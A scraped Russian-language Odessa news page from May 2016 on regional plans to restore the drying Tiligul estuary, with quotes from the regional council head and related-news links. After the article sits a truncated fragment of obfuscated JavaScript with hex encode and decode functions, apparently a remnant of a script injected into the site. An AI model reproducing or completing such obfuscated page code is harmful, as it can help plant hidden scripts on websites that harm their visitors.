Тилигульский лиман будут спасать от пересыхания

07.05.2016 в 12:23:55
Любопытно
3 0

Во второй половине мая будет согласовываться план действий по поэтапному восстановлению рекреационного и природоохранного потенциала Тилигульского лимана. Об этом сообщил на своей странице в Фейсбук глава Одесского облсовета Анатолий Урбанский, передает Репортер.

Тилигульский лиман будут спасать от пересыхания

По его словам, туризм для Одесской области является стратегическим видом деятельности.

«Мы должны сохранить один из самых чистых лиманов Северо-Западного Причерноморья – Тилигульский лиман с его уникальной природой и рекреационными территориями. Для согласования плана действий по поэтапному восстановлению рекреационного и природоохранного потенциала Тилигульского лимана во второй половине мая планируется совместное совещание экологов, землеустроителей, представителей депутатского корпуса облсоветов, местного самоуправления Одесской и Николаевской областей, в границах которых находится Тилигульский лиман», - отметил глава совета.

Напомним, что на проблему спасения лиманов, расположенных на территории Одесской области, неоднократно обращал внимание народный депутат Украины Сергей Кивалов. В частности, Сергей Кивалов предложил создать на территории Куяльницкого лимана курорт государственного значения. Это предложение уже нашло поддержку у представителей профильного министерства и областных властей. Также народный депутат ранее обращал внимание на важность спасения Тилигульского лимана от пересыхания

Напомним также, что за последние 60 лет уровень воды в лимане упал более чем на полметра.

В тему: В Одессе обеспокоились проблемой спасения Тилигульского лимана

  // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o


Внимание! Обнаружив ошибку или неточность в тексте, выделите ее и нажмите Ctrl+Enter. Далее следуйте инструкциям. Редакция сайта заранее благодарит всех бдительных читателей!

Читайте также

В Днестровском лимане баржа столкнулась с мостом
29.06 в 15:18:49|Общество
0 0

Везучий одессит удачно «выкупал» свое авто в Хаджибеевском лимане
07.11 в 19:51:50|Общество
0 1

На Николаевщине в лимане погибло 1,5 тонны рыбы
Тарпан построит еще один канализационный сток в Одессе
09.12 в 09:15:03|Общество
0 1

В Одесской области мотоциклист наехал на пешеходов и «нырнул» в лиман
24.10 в 14:00:52|Общество
0 0

Внимание! Обнаружив ошибку или неточность в тексте, выделите ее и нажмите Ctrl+Enter. Далее следуйте инструкциям. Редакция сайта заранее благодарит всех бдительных читателей!

Новости Одессы

Интервью

Престижный диплом и гарантированное трудоустройство: почему абитуриенты выбирают социально-правовой факультет Национального университета «Одесская юридическая академия»

Выбор учебного заведения – задача не менее ответственная, чем выбор самой профессии. Но не менее важно выбрать факультет и определиться с будущей специальностью, которая соответствует всем чаяниям и требованиям абитуриента.

11.02 в 14:31:00|Общество
1 0
Все интервью